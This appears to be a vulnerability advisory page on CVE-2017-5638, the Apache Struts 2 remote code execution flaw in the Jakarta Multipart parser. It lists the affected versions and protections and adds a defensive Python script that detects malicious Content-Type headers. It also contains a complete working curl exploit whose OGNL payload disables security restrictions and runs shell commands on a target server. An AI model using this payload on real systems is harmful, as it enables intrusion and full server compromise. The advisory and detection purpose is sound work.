Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit leverages a flawed exception handling mechanism during file upload. An attacker crafts a malicious `Content-Type` header in an HTTP request. When a file upload is submitted with this malformed header, the parser fails and throws an exception. The error message is constructed using untrusted user input from the header without proper sanitization. This allows the attacker to inject Object-Graph Navigation Language (OGNL) expressions directly into the error message evaluation context. The Struts framework then interprets these injected OGNL expressions on the server side. Since OGNL expressions can execute arbitrary Java code, this vulnerability leads to remote code execution with the privileges of the Struts application server, granting the attacker full control over the affected system.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability: Remote Code Execution

Severity: Critical

Date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/struts2-showcase/fileupload/doUpload.action`

How Exploit:

Malicious Content-Type header.

OGNL expression injection.

Arbitrary command execution.

Protection from this CVE:

Apply official patch.

Upgrade Struts version.

Use alternative parser.
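
A defender-side check for the Content-Type abuse described above, added here as an example (not code from the advisory or the Struts project): it flags header values that carry expression delimiters or do not parse as a media type, and tests a version string against the affected ranges listed on this page. The tab-separated log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Affected ranges as listed on this page (inclusive bounds).
AFFECTED = [((2, 3, 5), (2, 3, 31)), ((2, 5), (2, 5, 10))]

# RFC 7230 "token" characters; '{', '(' and '=' are not among them.
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
_MEDIA_TYPE = re.compile(
    "^" + _TOKEN + "/" + _TOKEN
    + r"(?:\s*;\s*" + _TOKEN + "=(?:" + _TOKEN + r'|"[^"\\]*"))*\s*$'
)

def is_affected(version):
    """True if a plain dotted Struts version falls in a range listed on the page."""
    v = tuple(int(p) for p in version.split("."))
    return any(lo <= v <= hi for lo, hi in AFFECTED)

def classify_content_type(value):
    """Return 'ognl-marker', 'malformed' or 'ok' for one Content-Type value."""
    if "%{" in value or "${" in value:
        return "ognl-marker"      # expression delimiters never belong in a media type
    if not _MEDIA_TYPE.match(value.strip()):
        return "malformed"        # not type/subtype[; param=value]
    return "ok"

def scan(lines):
    """Return (source, path, verdict) for every request worth reviewing."""
    hits = []
    for line in lines:
        src, path, ctype = line.rstrip("\n").split("\t", 2)
        verdict = classify_content_type(ctype)
        if verdict != "ok":
            hits.append((src, path, verdict))
    return hits

# Constructed sample log: source, path, Content-Type (tab-separated).
# The flagged value is a harmless stand-in, not a working payload.
SAMPLE = [
    "198.51.100.7\t/upload.action\tmultipart/form-data; boundary=----abc123",
    "203.0.113.9\t/upload.action\t%{(#_='multipart/form-data').(#probe=1)}",
    "203.0.113.9\t/api/items\tapplication/json; charset=utf-8",
    "192.0.2.44\t/upload.action\tmultipart/form-data boundary",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
    print("2.3.31 affected:", is_affected("2.3.31"))
```

The same two conditions can be enforced at a reverse proxy or WAF in front of the application, so that a request whose Content-Type fails them is rejected before it reaches the multipart parser.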

Impact:

Full system compromise.

Data breach.

Service disruption.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
